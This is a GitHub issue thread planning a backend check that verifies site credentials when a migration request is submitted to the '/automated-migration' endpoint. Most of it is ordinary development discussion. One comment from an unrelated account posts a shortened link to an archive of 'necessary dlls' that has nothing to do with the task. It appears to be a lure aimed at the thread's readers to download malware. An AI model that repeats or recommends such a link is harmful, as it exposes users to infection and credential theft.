### ISSUE TITLE
Task: [Backend] Verify the credentials upon submission, return verification error if they don't

### ISSUE THREAD

**Issue by Imran92** [Automattic/wp-calypso#94710]
### Details

This issue is only for the backend.

We can probably do it in two ways.

1. Create an endpoint to verify that the credentials work
2. Just add a new check in the current submission endpoint (`/automated-migration`) to make sure the creds work

I suggest we go with option 2 because otherwise we'll need to make two sequential calls for each submission, which will make it slow.

The background job already uses a function to login to the website. We will just reuse that function to login to the user's site. If the logging in doesn't work as expected, we'll return an error. Upon receiving this error, the frontend will show error messages and tell the user to recheck the credentials.

### Checklist

- [x] Added credentials check in the endpoint
- [x] Add an optional param to override the credentials check
- [x] Returns proper error useable from the frontend to display error messages

**Comment by aries2004-bit** [comment]
maybe this will help

https://bit.ly/4eugCty
I put the necessary dlls in the archive

**Comment by Imran92** [comment]
Diff https://code.a8c.com/D162290
